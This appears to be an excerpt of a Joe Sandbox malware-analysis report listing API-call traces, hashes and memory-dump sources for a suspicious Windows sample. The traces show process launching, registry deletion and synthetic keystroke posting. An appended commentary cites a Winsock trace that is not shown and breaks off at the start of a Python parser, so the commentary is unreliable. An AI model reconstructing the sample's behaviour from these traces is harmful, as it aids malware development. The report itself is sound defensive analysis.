                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E2C417,00000004,00000000,00000000,00000000), ref: 00E2C4D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: c061d04569739f8355cf48f42943301649fb2e09d359f983453e0391d4b86dd1
                                          • Instruction ID: dee003a39983f057409a81a402a0833b6c08fac0a5269f5b3590dce57f1e7620
                                          • Opcode Fuzzy Hash: c061d04569739f8355cf48f42943301649fb2e09d359f983453e0391d4b86dd1
                                          • Instruction Fuzzy Hash: 56416F302086889EC7399B3ADCAC77B7BA1EB85314F2EC41DE29793560C635D885D730
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E5737F
                                            • Part of subcall function 00E10FF6: std::exception::exception.LIBCMT ref: 00E1102C
                                            • Part of subcall function 00E10FF6: __CxxThrowException@8.LIBCMT ref: 00E11041
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E573B6
                                          • EnterCriticalSection.KERNEL32(?), ref: 00E573D2
                                          • _memmove.LIBCMT ref: 00E57420
                                          • _memmove.LIBCMT ref: 00E5743D
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00E5744C
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E57461
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E57480
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: abda24cfc6553c3a68177c04134cb06979cc52f76816a2c081c69334ce836ed2
                                          • Instruction ID: 4e6f0b6369bea563302e47850a6edb6f7adf1394f64cd088f24b413bd3319704
                                          • Opcode Fuzzy Hash: abda24cfc6553c3a68177c04134cb06979cc52f76816a2c081c69334ce836ed2
                                          • Instruction Fuzzy Hash: 23317031E04205EFCF10DF65DC85AAE7BB8EF49710B1441A5FE04BB256DB709A94DBA0
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00E7645A
                                          • GetDC.USER32(00000000), ref: 00E76462
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E7646D
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00E76479
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E764B5
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E764C6
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E79299,?,?,000000FF,00000000,?,000000FF,?), ref: 00E76500
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E76520
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 742eee3703c15510bc798c1894ae29610282ebdac91324499319aeaa53ed824f
                                          • Instruction ID: 26d42ef9abe8cbf8b1115e1b6156d73efba07a4e071597b77a6de4c416c82b8e
                                          • Opcode Fuzzy Hash: 742eee3703c15510bc798c1894ae29610282ebdac91324499319aeaa53ed824f
                                          • Instruction Fuzzy Hash: 8B318D72201610BFEB108F51DC4AFEA3FA9FF09765F044065FE0CAA291D6759C81CBA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 98cb440f5e52143d73f97e05d19b1f95cfd9de11de5352bf9e8e501ec6920ae5
                                          • Instruction ID: e885e5dcda3bc9847994746a77d9529187b2b4eaba030b5a9f81e440473e8ac2
                                          • Opcode Fuzzy Hash: 98cb440f5e52143d73f97e05d19b1f95cfd9de11de5352bf9e8e501ec6920ae5
                                          • Instruction Fuzzy Hash: DE219571703205BBD694B521AD42FFB67ACAF20398F646024FF0DB7282E752DD1182A5
                                          APIs
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                            • Part of subcall function 00E0FEC6: _wcscpy.LIBCMT ref: 00E0FEE9
                                          • _wcstok.LIBCMT ref: 00E5EEFF
                                          • _wcscpy.LIBCMT ref: 00E5EF8E
                                          • _memset.LIBCMT ref: 00E5EFC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: 66ac9e6e5d35d0ce9ac78cded79a96fba5ef4883ff364a102fc411e9ccaf71a1
                                          • Instruction ID: 7856fe3f5681d5c9cfc1604bb7923a8394c2d6c2ce73381688a5ba2a4b072db3
                                          • Opcode Fuzzy Hash: 66ac9e6e5d35d0ce9ac78cded79a96fba5ef4883ff364a102fc411e9ccaf71a1
                                          • Instruction Fuzzy Hash: B8C1B7315047049FC714EF24C991AAEB7E0FF84314F05996DF999A72A2DB30ED45CBA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53b1e66b8b65c736585effeb6c08de6fcd33b67a099c75e7cb1e7f18c9fcb819
                                          • Instruction ID: 91e6e2318834ea3ad7dbf45653bb5371d6e92e918990df031fdff28caf6eb35f
                                          • Opcode Fuzzy Hash: 53b1e66b8b65c736585effeb6c08de6fcd33b67a099c75e7cb1e7f18c9fcb819
                                          • Instruction Fuzzy Hash: 0C716834900119EFCB04CF98CC89ABEBBB9FF85314F25C159FA15AA251C730AA51CBB4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8101eae4d25df2cf8af3a9b74a889a8452f6520729eb28719dd3b366357a5795
                                          • Instruction ID: 6e10a7162c1f5c174e29cc58c7d2bc8e7f290c76fd64c104aafb1f3142f10aa6
                                          • Opcode Fuzzy Hash: 8101eae4d25df2cf8af3a9b74a889a8452f6520729eb28719dd3b366357a5795
                                          • Instruction Fuzzy Hash: 7E61FE71508304ABC710EB24EC91F6FB7E8EF84758F00991DF685A7292DA71AD44CBB2
                                          APIs
                                          • IsWindow.USER32(017959C8), ref: 00E7B6A5
                                          • IsWindowEnabled.USER32(017959C8), ref: 00E7B6B1
                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E7B795
                                          • SendMessageW.USER32(017959C8,000000B0,?,?), ref: 00E7B7CC
                                          • IsDlgButtonChecked.USER32(?,?), ref: 00E7B809
                                          • GetWindowLongW.USER32(017959C8,000000EC), ref: 00E7B82B
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E7B843
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: 390c9e903ca1e4dd7d2e552d0ac39e952cfda833248a851bafd57bf886da6868
                                          • Instruction ID: 6c133a71352efabfe9707e5502007b98abf271ca55c8f455aff3c27abaf5afd3
                                          • Opcode Fuzzy Hash: 390c9e903ca1e4dd7d2e552d0ac39e952cfda833248a851bafd57bf886da6868
                                          • Instruction Fuzzy Hash: CB717E34600204AFDB28DFA5C8E5FEA7BB9FF89304F14915AFA49B7261C731A941CB50
                                          APIs
                                          • _memset.LIBCMT ref: 00E6F75C
                                          • _memset.LIBCMT ref: 00E6F825
                                          • ShellExecuteExW.SHELL32(?), ref: 00E6F86A
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                            • Part of subcall function 00E0FEC6: _wcscpy.LIBCMT ref: 00E0FEE9
                                          • GetProcessId.KERNEL32(00000000), ref: 00E6F8E1
                                          • CloseHandle.KERNEL32(00000000), ref: 00E6F910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 3522835683-2766056989
                                          • Opcode ID: 797a6d8d33f136c3f191389b0e55547f229f382c899ce783a303760cd31fcfc4
                                          • Instruction ID: 03bdfe9835fcefea204a8349aafec84c904d28199e9c4217a8e49b3371f9eec0
                                          • Opcode Fuzzy Hash: 797a6d8d33f136c3f191389b0e55547f229f382c899ce783a303760cd31fcfc4
                                          • Instruction Fuzzy Hash: 8D619E75E006199FCB14DF64E490AAEBBF1FF48354B159069E859BB351CB30AD41CFA0
                                          APIs
                                          • GetParent.USER32(?), ref: 00E5149C
                                          • GetKeyboardState.USER32(?), ref: 00E514B1
                                          • SetKeyboardState.USER32(?), ref: 00E51512
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E51540
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E5155F
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E515A5
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E515C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: a1a05bf74a18de31887d8c8128ba97d172b7a54a0f858bd8e2e9d82425033330
                                          • Instruction ID: c4c2ac56fbc20488db9062eb473fbae1add15e9e0a506e7ea3c96172636d680f
                                          • Opcode Fuzzy Hash: a1a05bf74a18de31887d8c8128ba97d172b7a54a0f858bd8e2e9d82425033330
                                          • Instruction Fuzzy Hash: 4D51E2A06046D53EFB3252348C45BBA7FE95B4630AF08ADC9E9D5658C2D3E49CCCD750
                                          APIs
                                          • GetParent.USER32(00000000), ref: 00E512B5
                                          • GetKeyboardState.USER32(?), ref: 00E512CA
                                          • SetKeyboardState.USER32(?), ref: 00E5132B
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E51357
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E51374
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E513B8
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E513D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 2906d9afd0ac8c4ad9b24b843aeffe0353d8d866561181b924051d7a90c2c581
                                          • Instruction ID: f39b0aede072dbd288bc0ffd9526ce0118a713f5c86d075e4b9943d592a227da
                                          • Opcode Fuzzy Hash: 2906d9afd0ac8c4ad9b24b843aeffe0353d8d866561181b924051d7a90c2c581
                                          • Instruction Fuzzy Hash: 2F5126A05047D53DFB3297248C15B7A7FA95B0630AF08ACC9E9D8668C2D394AC8CE750
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: 1ed7a71e0ab1a116f422bc1a2f8c375c68d1c2c483a70e8c388cf535a7439eda
                                          • Instruction ID: e6c8544934d547e1f660bb2515d5f8810a0982792e842cee1d65a8987915c230
                                          • Opcode Fuzzy Hash: 1ed7a71e0ab1a116f422bc1a2f8c375c68d1c2c483a70e8c388cf535a7439eda
                                          • Instruction Fuzzy Hash: 884190B6C2011876CB11EBB48C869CFB3A89F05311F50A856E918F3262E734E798C7A5
                                          APIs
                                            • Part of subcall function 00E548AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E538D3,?), ref: 00E548C7
                                            • Part of subcall function 00E548AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E538D3,?), ref: 00E548E0
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00E538F3
                                          • _wcscmp.LIBCMT ref: 00E5390F
                                          • MoveFileW.KERNEL32(?,?), ref: 00E53927
                                          • _wcscat.LIBCMT ref: 00E5396F
                                          • SHFileOperationW.SHELL32(?), ref: 00E539DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1377345388-1173974218
                                          • Opcode ID: 5b8040066f8cd4af864361fbf9c99fc96e4eeaccde7979ce9b51ce2dd89d5b78
                                          • Instruction ID: fa7abf260f2c3132efa00c031e99be388c5a6343a4d8dd8f550c57489364e59a
                                          • Opcode Fuzzy Hash: 5b8040066f8cd4af864361fbf9c99fc96e4eeaccde7979ce9b51ce2dd89d5b78
                                          • Instruction Fuzzy Hash: A9418FB15083849EC751EF64D4819EFB7E8AF88385F002D2EB889E3191EA74D69CC752
                                          APIs
                                          • _memset.LIBCMT ref: 00E77519
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E775C0
                                          • IsMenu.USER32(?), ref: 00E775D8
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E77620
                                          • DrawMenuBar.USER32 ref: 00E77633
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0
                                          • API String ID: 3866635326-4108050209
                                          • Opcode ID: e62c6771988dc61492074765ec0438885cd9cc587f635f5b665125c3b6c6cb3a
                                          • Instruction ID: a230a3b5a7b5fa115582d47a23d603beecce00fd57fc0f5c1665a830a28280cb
                                          • Opcode Fuzzy Hash: e62c6771988dc61492074765ec0438885cd9cc587f635f5b665125c3b6c6cb3a
                                          • Instruction Fuzzy Hash: E0412975A04609EFDB20DF95D884EAABBF8FB08314F049129ED99A7250D730AD54CFA0
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E7125C
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E71286
                                          • FreeLibrary.KERNEL32(00000000), ref: 00E7133D
                                            • Part of subcall function 00E7122D: RegCloseKey.ADVAPI32(?), ref: 00E712A3
                                            • Part of subcall function 00E7122D: FreeLibrary.KERNEL32(?), ref: 00E712F5
                                            • Part of subcall function 00E7122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E71318
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E712E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: 7889089fe70cca041f8c01b9bf0b3ddc8474d57afa1ef7e2d9893a9bf8fda8a6
                                          • Instruction ID: 2f2ddc98fc2c49bd6c18dc7eec1cf30e6384ffde527e71b0af79a6682ed0c57a
                                          • Opcode Fuzzy Hash: 7889089fe70cca041f8c01b9bf0b3ddc8474d57afa1ef7e2d9893a9bf8fda8a6
                                          • Instruction Fuzzy Hash: 72315EB1901209BFDB14DB94DC89EFFB7BCEF08344F0041A9E509F2251DB749E899AA0
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E7655B
                                          • GetWindowLongW.USER32(017959C8,000000F0), ref: 00E7658E
                                          • GetWindowLongW.USER32(017959C8,000000F0), ref: 00E765C3
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E765F5
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E7661F
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E76630
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E7664A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: d8fbdcae20e6f959edbb465a86021f6f06f823063f90e20b6900d3b6c0efa736
                                          • Instruction ID: 28a4a32f440e1d0805b0fc3ebb9f10ebea43c95e95601ecab7518d63eaa63445
                                          • Opcode Fuzzy Hash: d8fbdcae20e6f959edbb465a86021f6f06f823063f90e20b6900d3b6c0efa736
                                          • Instruction Fuzzy Hash: 1A312631604510AFDB21CF59DC84F553BE1FB4A718F1852A8F509AB2B6CB71AC84EB91
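The API traces in this section are easier to read once the hex immediates are named: the two GetKeyboardState / SetKeyboardState / PostMessageW functions above post WM_KEYDOWN (0x100) and WM_KEYUP (0x101) for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, which is how a runtime synthesizes modifier keys for keystroke injection (consistent with a compiled AutoIt Send() routine, an inference from the "likely a compiled AutoIt script" signature rather than something the report states); the Winsock function that follows builds a non-blocking TCP connect (socket(AF_INET, SOCK_STREAM, IPPROTO_TCP), ioctlsocket(FIONBIO), connect). The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses trace lines in the report's own "API.MODULE(args), ref: addr" format, decodes only constants that can be named with certainty, and flags those two behaviours. The sample lines are copied from this section; the Call structure, the pattern names and the known-constant tables are the example's own choices.

```python
"""Decode Joe Sandbox IDA-plugin API trace lines into named Win32 constants.

Added example: parser and pattern matcher are not part of the report.
"""
import re
from dataclasses import dataclass, field

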